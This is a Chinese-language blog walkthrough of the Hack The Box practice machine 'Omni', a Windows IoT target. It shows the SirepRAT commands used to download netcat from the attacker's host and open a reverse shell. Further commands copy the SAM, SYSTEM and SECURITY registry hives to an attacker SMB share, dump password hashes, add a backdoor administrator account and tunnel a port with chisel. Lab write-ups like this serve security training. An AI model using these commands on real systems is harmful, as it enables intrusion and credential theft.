【Hack The Box】windows练习-- Omni

HTB 学习笔记

【Hack The Box】windows练习-- Omni

---

🔥系列专栏：Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间：🌴2022年11月7日🌴
🍭作者水平很有限，如果发现错误，还望告知，感谢！

信息收集

135/tcp   open  msrpc    Microsoft Windows RPC
5985/tcp  open  upnp     Microsoft IIS httpd
8080/tcp  open  upnp     Microsoft IIS httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
29817/tcp open  unknown
29819/tcp open  arcserve ARCserve Discovery
29820/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.80%I=7%D=8/23%Time=5F42B5BD%P=x86_64-pc-linux-gnu%r(N
SF:ULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,"
SF:\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x0
SF:4G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\x
SF:c9}\xc8O\x12");
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows

有web,winrm,135，还有29819/29820 ，这两个端口可以iot攻击

rpc枚举

rpcclient -U "" -N 10.10.10.204

没有信息

web枚举

再来到web进行一下枚举以及信息收集
需要我输入账号密码

使用nikto -h [url]检查一下
发现这么一个服务

Windows Device Portal

我们可以再去谷歌一下，确实存在lot攻击的可能性

iot攻击

可以进行iot攻击
提供远程未经身份验证的执行作为 SYSTEM

下载地址：

https://github.com/SafeBreach-Labs/SirepRAT

dir目录，也顺便知道哪个可以dir，一会可以放nc反弹

python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c dir c:\windows\system32\spool\drivers\color /b'

2. 下载nc

python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c powershell Invoke-WebRequest -outfile c:\windows\system32\spool\drivers\color\nc.exe -uri http://10.10.14.24/nc64.exe' 

3. 反弹shell

python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c c:\windows\system32\spool\drivers\color\nc.exe -e cmd 10.10.14.24 443'

我们是system但是啥都看不到，我真无语，两个flag都有什么莫名其妙的加密
找文件，如下命令

Get-ChildItem -Path C:\ -Filter user.txt -Recurse -ErrorAction SilentlyContinue -Force 

类似于下面的情况，是SCredential，我们需要 用户密码解密

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990af0986d008a36c133c36f4da2f9406ae7</SS>
    </Props>
  </Obj>
</Objs>

我不知道改增么办

不过这里我也突然发现，我能在system32中随意动作，这是不是意味着我时system用户？那我应该可以直接备份然后转储hash，因为我们没有凭据，所以我们可以在靶场中转储，再传出来
用于我们只有反弹高权限shell，但是没有凭据
下面的例子我已经建立了一个简单的smbshare

reg save HKLM\sam \\10.10.14.24\share\sam
reg save HKLM\system \\10.10.14.24\share\system
reg save HKLM\security \\10.10.14.24\share\security
secretsdump.py -sam sam -security security -system system LOCAL

建立smbshare如下
smbserver.py share . -smb2support -username df -password df
靶场也链接到smbshare

python SirepRAT.py 10.129.2.27 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c net use \\10.10.14.8\share /u:df df'

secretsdump.py -sam sam -security security -system system LOCAL

我们同样拥有远程提取hash的方法
首先创建一个用户，这样我们就可以远程了，因为有了凭据

1. 创建一个用户
net user fakeadmin passw0rd! /add
2. 加入admin组
net localgroup administrators /add fakeadmin
3. 检查
net localgroup administrators
但是会被刷新
所以我们在添加之前先来个一秒的ping，让我们好开干，但是因为nmap没扫出来445，所以我们要打个隧道，就打一个端口就行

./chisel server -p 8000 --reverse
.\c.exe client 10.10.14.24:8000 R:445:localhost:445
而后
secretsdump.py 'fakeadmin:passw0rd!@127.0.0.1'

注意抓紧时间即可
有了hash破解就行，去网站破解

但是445没有开，所以我们不能直接远程登录进去

于是我再次实验登陆webshell
我这次成功了
原因是我上次在最后面多输入了一个引号
mlgb

接着反弹了一个shell，没啥说的

SCredential破解

$UserCred = Import-Clixml -Path C:\data\users\administrator\root.txt
$UserCred.GetNetworkCredential().password
或者下面这个命令，非常好用
(Import-CliXml -Path root.txt).GetNetworkCredential() | fl

用户的一样，刚才hash不是都拿到了么